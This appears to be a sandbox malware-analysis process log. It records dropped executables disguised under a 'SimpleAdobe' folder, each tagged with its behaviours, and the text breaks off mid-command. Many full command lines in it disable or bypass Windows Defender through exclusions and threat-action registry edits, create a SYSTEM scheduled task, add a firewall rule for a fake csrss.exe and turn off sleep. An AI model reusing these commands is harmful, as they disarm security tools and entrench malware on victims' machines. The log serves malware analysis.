C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
PID:3984 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:2792
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:2380
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6456 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:6156
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 13:33:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS3A5.tmp\Install.exe\" LY /uOmdidxfbI 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4424
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"5⤵PID:4796
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn butYHpXTvMdZIJsEKZ6⤵PID:2896
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn butYHpXTvMdZIJsEKZ7⤵PID:6448
-
-
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\hfoYQesW8IJZ10pnd5hzvSEz.exeC:\Users\Admin\Documents\SimpleAdobe\hfoYQesW8IJZ10pnd5hzvSEz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4836 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 23164⤵
- Program crash
PID:6848
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\dYxScN9MMZvzIWB3AkbI0aU0.exeC:\Users\Admin\Documents\SimpleAdobe\dYxScN9MMZvzIWB3AkbI0aU0.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3384
-
-
C:\Users\Admin\Documents\SimpleAdobe\SgyWxN7jSEUOkw_HmuPeEZI0.exeC:\Users\Admin\Documents\SimpleAdobe\SgyWxN7jSEUOkw_HmuPeEZI0.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2960 -
C:\Users\Admin\Documents\SimpleAdobe\SgyWxN7jSEUOkw_HmuPeEZI0.exeC:\Users\Admin\Documents\SimpleAdobe\SgyWxN7jSEUOkw_HmuPeEZI0.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4400 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\7dd73705-8f6d-4ee2-a162-e1ac0f84b7b7" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:800
-
-
C:\Users\Admin\Documents\SimpleAdobe\SgyWxN7jSEUOkw_HmuPeEZI0.exe"C:\Users\Admin\Documents\SimpleAdobe\SgyWxN7jSEUOkw_HmuPeEZI0.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6176 -
C:\Users\Admin\Documents\SimpleAdobe\SgyWxN7jSEUOkw_HmuPeEZI0.exe"C:\Users\Admin\Documents\SimpleAdobe\SgyWxN7jSEUOkw_HmuPeEZI0.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
PID:2392
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\qSN72VNu1dsgP8LHOGW1Rl9s.exeC:\Users\Admin\Documents\SimpleAdobe\qSN72VNu1dsgP8LHOGW1Rl9s.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1280
-
-
C:\Users\Admin\Documents\SimpleAdobe\ILm1VJidP2rxCFpVshnScgnv.exeC:\Users\Admin\Documents\SimpleAdobe\ILm1VJidP2rxCFpVshnScgnv.exe2⤵
- Executes dropped EXE
PID:4800
-
-
C:\Users\Admin\Documents\SimpleAdobe\yyr14Q2qYaLOAnqjm2zPa6oC.exeC:\Users\Admin\Documents\SimpleAdobe\yyr14Q2qYaLOAnqjm2zPa6oC.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5088 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 9883⤵
- Program crash
PID:6200
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\Aiu1y1TzmkCw7FwsSWl6ROeB.exeC:\Users\Admin\Documents\SimpleAdobe\Aiu1y1TzmkCw7FwsSWl6ROeB.exe2⤵
- Executes dropped EXE
PID:3940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Command and Scripting Interpreter: PowerShell
PID:5584
-
-
C:\Users\Admin\Documents\SimpleAdobe\Aiu1y1TzmkCw7FwsSWl6ROeB.exe"C:\Users\Admin\Documents\SimpleAdobe\Aiu1y1TzmkCw7FwsSWl6ROeB.exe"3⤵PID:6616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
PID:1136
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:3776
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:5688
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
PID:4680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
PID:3700
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵PID:2412
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 6323⤵
- Program crash
PID:6148
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4392
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:5912
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5088 -ip 50881⤵PID:1844
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2924 -ip 29241⤵PID:6756
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeC:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:468 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:6512
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:6508
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1088
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe"C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5100 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵PID:5564
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵PID:6664
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵PID:6676
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵PID:3232
-
-
C:\Windows\system32\svchost.exesvchost.exe4⤵PID:2356
-
-
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:6564
-
-
C:\Users\Admin\AppData\Local\Temp\7zS3A5.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS3A5.tmp\Install.exe LY /uOmdidxfbI 525403 /S1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:6252
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:6732
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5768
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:5532
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:6608
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:7016
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:3388
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5672
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:6884
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:6044
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:1336
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5172
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:832
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:6068
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:5596 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:5312
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Modifies data under HKEY_USERS
PID:6344 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:7052
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:6072
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:6284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:6352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:6656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:6828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:60
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:6712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:6600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2044
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 